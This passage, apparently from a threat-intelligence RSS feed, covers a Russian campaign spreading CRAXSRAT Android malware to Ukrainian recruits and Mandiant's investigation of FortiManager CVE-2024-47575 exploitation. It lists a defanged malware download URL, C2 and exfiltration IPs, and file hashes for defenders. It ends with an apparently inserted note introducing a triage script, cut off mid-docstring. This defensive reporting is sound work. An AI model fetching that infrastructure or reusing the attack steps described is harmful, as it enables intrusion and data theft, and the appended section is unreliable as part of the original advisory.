However, an additional identified sample (MD5: aab597cdc5bc02f6c9d0d36ddeb7e624) was found to contain the same SUNSPINNER decoy application as in the Windows delivery chain. When opened, this version requests the Android REQUEST_INSTALL_PACKAGES permission from the user, which if granted, downloads the CRAXSRAT payload from </span><code style="vertical-align: baseline;">http://h315225216.nichost[.]ru/itmo2020/Student/map_markers/CivilDefense.apk</code><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russian-espionage-influence-fig7.max-1000x1000.png" alt="Error message displayed if the user doesn’t grant REQUEST_INSTALL_PACKAGES permission"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 7: Error message displayed if the user doesn’t grant </span><code style="font-style: italic; vertical-align: baseline;">REQUEST_INSTALL_PACKAGES</code><span style="vertical-align: baseline;"> permission</span></span></p></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Protecting Our Users</span></h2> <p><span style="vertical-align: baseline;">As part of our efforts to combat serious threat actors, we use the results of our research to improve the safety and security of Google’s products. 
Upon discovery, all identified websites, domains and files are added to </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Safe Browsing</span></a><span style="vertical-align: baseline;"> to protect users from further exploitation. </span></p> <p><span style="vertical-align: baseline;">Google also continuously monitors for Android spyware, and we deploy and constantly update protections in </span><a href="https://support.google.com/accounts/answer/2812853" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Play Protect</span></a><span style="vertical-align: baseline;">, which offers users protection in and outside of Google Play, checking devices for potentially harmful apps regardless of the install source. Notably, UNC5812's Civil Defense website specifically included social engineering content and detailed video instructions on how the targeted user should turn off Google Play Protect and manually enable Android permissions required by CRAXSRAT in order to function. Safe Browsing also protects Chrome users on Android by showing them warnings before they visit dangerous sites. App scanning infrastructure protects Google Play and powers Verify Apps to additionally protect users who install apps from outside Google Play. 
</span></p> <p><span style="vertical-align: baseline;">We have also shared our findings with Ukraine's national authorities who have taken action to disrupt the campaign's reach by blocking resolution of the actor-controlled "Civil Defense" website nationally.</span></p> <h2><span style="vertical-align: baseline;">Summary</span></h2> <p><span style="vertical-align: baseline;">UNC5812's hybrid espionage and information operation against potential Ukrainian military recruits is part of a wider spike in operational interest from Russian threat actors following changes made to Ukraine's national mobilization laws in 2024. In particular, we have seen the targeting of potential military recruits rise in prominence following the launch of Ukraine's national digital military ID used to manage the details of those liable for military service and boost recruitment. Consistent with research from </span><a href="https://euvsdisinfo.eu/how-russian-special-information-operations-try-to-undermine-mobilisation-in-ukraine/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">EUvsDisinfo</span></a><span style="vertical-align: baseline;">, we also continue to observe persistent efforts by pro-Russia influence actors to promote messaging undermining Ukraine's mobilization drive and sowing public distrust in the officials carrying it out.</span></p> <p><span style="vertical-align: baseline;">From a tradecraft perspective, UNC5812's campaign is highly characteristic of the emphasis Russia places on achieving cognitive effect via its cyber capabilities, and highlights the prominent role that messaging apps continue to play in malware delivery and other cyber dimensions of Russia's war in Ukraine. We judge that as long as Telegram continues to be a critical source of information during the war, it is almost certain to remain a primary vector for cyber-enabled activity for a range of Russian-linked espionage and influence activity. 
</span></p> <h2><span style="vertical-align: baseline;">Indicators of Compromise</span></h2> <p><span style="vertical-align: baseline;">For a more comprehensive set of UNC5812 indicators of compromise, a <a href="https://www.virustotal.com/gui/collection/ac6aa44201d5619ffa0b038f1431c7ab52ca826dee65a9bb457456c7b76007a4/" rel="noopener" target="_blank">Google Threat Intelligence Collection</a> is available for registered users.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Indicators of Compromise</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Context</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: 
baseline;">civildefense[.]com[.]ua</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5812 landing page</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">t[.]me/civildefense_com_ua</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5812 Telegram channel</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">t[.]me/UAcivildefenseUA</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5812 Telegram account</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">e98ee33466a270edc47fdd9faf67d82e</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SUNSPINNER decoy</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">h315225216.nichost[.]ru</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Resolver used in SUNSPINNER decoy</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">fu-laravel.onrender[.]com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hostname used in SUNSPINNER decoy</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; 
padding: 16px;"> <p><span style="vertical-align: baseline;">206.71.149[.]194</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 used to resolve distribution URLs</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">185.169.107[.]44</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Open directory used for malware distribution</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">d36d303d2954cb4309d34c613747ce58</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Pronsis Loader dropper</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">b3cf993d918c2c61c7138b4b8a98b6bf</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PURESTEALER</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">31cdae71f21e1fad7581b5f305a9d185</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CRAXSRAT</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">aab597cdc5bc02f6c9d0d36ddeb7e624</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CRAXSRAT w/ SUNSPINNER decoy </span></p> </td> </tr> </tbody> 
</table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div></description><pubDate>Mon, 28 Oct 2024 13:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Hybrid Russian Espionage and Influence Campaign Aims to Compromise Ukrainian Military Recruits and Deliver Anti-Mobilization Narratives</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Google Threat Intelligence Group </name><title></title><department></department><company></company></author></item><item><title>Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575)</title><link>https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575/</link><description><div class="block-paragraph_advanced"><p>Written by: Foti Castelan, Max Thauer, JP Glab, Gabby Roncone, Tufail Ahmed, Jared Wilson</p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Summary</span></h2> <p><span style="vertical-align: baseline;">In October 2024, Mandiant collaborated with Fortinet to investigate the mass exploitation of FortiManager appliances across 50+ potentially compromised FortiManager devices in various industries. 
The vulnerability, </span><a href="https://www.cve.org/CVERecord?id=CVE-2024-47575" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2024-47575</span></a><span style="vertical-align: baseline;"> / </span><a href="https://www.fortiguard.com/psirt/FG-IR-24-423" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">FG-IR-24-423</span></a><span style="vertical-align: baseline;">, allows a threat actor to use an unauthorized, threat actor-controlled FortiManager device to execute arbitrary code or commands against vulnerable FortiManager devices. </span></p> <p><span style="vertical-align: baseline;">Mandiant observed a new threat cluster we now track as UNC5820 exploiting the FortiManager vulnerability as early as June 27, 2024. UNC5820 staged and exfiltrated the configuration data of the FortiGate devices managed by the exploited FortiManager. This data contains detailed configuration information of the managed appliances as well as the users and their FortiOS256-hashed passwords. This data could be used by UNC5820 to further compromise the FortiManager, move laterally to the managed Fortinet devices, and ultimately target the enterprise environment.</span></p> <p><span style="vertical-align: baseline;">At this time, the data sources analyzed by Mandiant did not record the specific requests that the threat actor used to leverage the FortiManager vulnerability. Additionally, at this stage of our investigations there is no evidence that UNC5820 leveraged the obtained configuration data to move laterally and further compromise the environment. As a result, at the time of publishing, we lack sufficient data to assess actor motivation or location. 
As additional information becomes available through our investigations, Mandiant will update this blog’s attribution assessment.</span></p> <p><span style="vertical-align: baseline;">Organizations that may have their FortiManager exposed to the internet should conduct a forensic investigation immediately.</span></p> <h2><span style="vertical-align: baseline;">Exploitation Details</span></h2> <p><span style="vertical-align: baseline;">Mandiant’s earliest observed exploitation attempt occurred on June 27, 2024. On that day, multiple FortiManager devices received inbound connections from the IP address 45[.]32[.]41[.]202 on the default port TCP/541. At approximately the same time, the file system recorded the staging of various Fortinet configuration files in a Gzip-compressed archive named /tmp/.tm. This archive contained the files and folders as listed in Table 1.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 
100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; 
overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Filename</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/var/dm/RCS</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Folder containing configuration files of managed FortiGate devices</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/var/dm/RCS/revinfo.db</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Database containing additional information of the managed FortiGate devices</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/var/fds/data/devices.txt</span></p> </td> <td 
style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Contains a list of FortiGate serials and their corresponding IP addresses</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/var/pm2/global.db</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Global database that contains object configurations, policy packages, and header and footer sensor configuration for IPS</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/var/old_fmversion</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Contains current FortiManager version, build, and branch information</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; margin-top: 8px; width: 100%; font-style: italic;">Table 1: Content of /tmp/.tm</span></p> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">On Sept. 23, 2024, Mandiant observed a second exploitation attempt with the same indicators. In both exploitation events, outbound network traffic occurred shortly after the archive creation. The number of bytes sent to the respective destination IP addresses is slightly larger than the size of the archive. 
Table 2 lists the details of this activity.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: 
#5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Timestamp</strong></p> </td> 
<td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Size</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-06-27 12:44:04</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/tmp/.tm (File creation)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Unknown</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-06-27 12:44:11</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound traffic to 195[.]85[.]114[.]78:443</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1,819,425 bytes</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-23 11:31:12</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/tmp/.tm (File modification)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1,772,650 bytes</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-23 11:31:19</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> 
<p><span style="vertical-align: baseline;">Outbound traffic to 104[.]238[.]141[.]143:443</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1,822,968 bytes</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: Correlation of staged configuration data and outbound traffic of the two exploitation attempts</span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">During the second exploitation attempt, the threat actor’s device was registered to the targeted FortiManager. 
Figure 1 lists the unauthorized FortiManager in the Global Objects database along with the timestamp when it was added.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fortinet-zero-day-fig1.max-1000x1000.png" alt="Threat actor’s device added to Global Objects database"> </a> <figcaption class="article-image__caption "><p data-block-key="snwpm">Figure 1: Threat actor’s device added to Global Objects database</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Once the threat actor successfully exploited the FortiManager, their unknown Fortinet device appeared in the FortiManager console.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fortinet-zero-day-fig2.max-1000x1000.png" alt="Unauthorized device listed in FortiManager console"> </a> <figcaption class="article-image__caption "><p data-block-key="1b2uy">Figure 2: Unauthorized device listed in FortiManager console</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">An additional indicator of successful exploitation is the addition of the unauthorized device serial number “FMG-VMTM23017412” and its corresponding IP address 45[.]32[.]41[.]202 to the file </span><span style="font-style: italic; vertical-align: baseline;">/fds/data/unreg_devices.txt</span><span style="vertical-align: baseline;">. 
Figure 3 lists the content of this file.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>FMG-VMTM23017412|45.32.41.202</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 3: Content of /fds/data/unreg_devices.txt</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The files </span><span style="font-style: italic; vertical-align: baseline;">/fds/data/subs.dat</span><span style="vertical-align: baseline;"> and </span><span style="font-style: italic; vertical-align: baseline;">/fds/data/subs.dat.tmp </span><span style="vertical-align: baseline;">contain additional indicators of the exploitation that include an associated disposable email address and a company name as listed in Figure 4.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>SerialNumber=FMG-VMTM23017412|AccountID= 0qsc137p@justdefinition.com|Company=Purity Supreme|UserID=1756868</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 4: Content of /fds/data/subs.dat</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Mandiant scraped the FortiManager’s memory image for additional artifacts of threat actor activity and detected a JSON blob containing the keywords “FMG-VMTM23017412” and “45[.]32[.]41[.]202”. This JSON blob also included a “first_tunnel_up” key, which contained the epoch time of 1726999303 as its value. 
This timestamp translates to 2024-09-22 10:01:43 UTC.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fortinet-zero-day-fig5a.max-1000x1000.png" alt="Tunnel up artifacts"> </a> <figcaption class="article-image__caption "><p data-block-key="7z149">Figure 5: Tunnel up artifacts</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Lack of Follow-On Malicious Activity</span></h2> <p><span style="vertical-align: baseline;">Mandiant reviewed the rootfs.gz, which is an initramfs (RAM disk) for the device that gets mounted to /bin. We did not find any malicious files created or modified during the time frame of exploitation activity. </span></p> <p><span style="vertical-align: baseline;">Google Cloud notified affected customers who showed similar activity in their environments. Additionally, Google Threat Intelligence ran retrohunts while developing detections for this activity, and manually escalated Pre-Release Detection Rule alerts to affected SecOps customers to assist with detecting exploit attempts of Fortinet devices. 
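</span></p> <p><span style="vertical-align: baseline;">The host artifacts described above (the SERIAL|IP record in unreg_devices.txt, the pipe-joined fields in subs.dat, the first_tunnel_up epoch in memory), the elog strings quoted in Table 3, and the staged-archive-then-egress pattern in Table 2 can all be checked by a short script. The following is an added example written for this page, not Mandiant's or Fortinet's tooling, and it also implements the baselining guidance from the Detection section (alerting on "Unregistered" in the changes field and on FortiGate serials not seen before). It assumes that FortiManager event-log lines are space-separated key=value pairs with optionally double-quoted values, that the two /fds/data files have the layouts shown in Figures 3 and 4, and that "shortly after" and "approximately equal" in the egress correlation can be taken as a 60-second window and a 10% byte tolerance. The sample log lines, the event list, and the baseline serial FGT60FTK20001234 are constructed; the indicator values are the ones quoted on the page.</span></p>

```python
"""Triage helpers for the FortiManager artifacts, log strings and staging/egress
pattern described above. Added example for this page, not Mandiant's or Fortinet's
code. Assumptions: event-log lines are space-separated key=value pairs with optionally
double-quoted values; unreg_devices.txt is one SERIAL|IP per line (Figure 3); subs.dat
is '|'-joined KEY=VALUE fields (Figure 4); "shortly after" / "approximately equal" are
taken as a 60 s window and a 10% byte tolerance. Sample lines, events and the baseline
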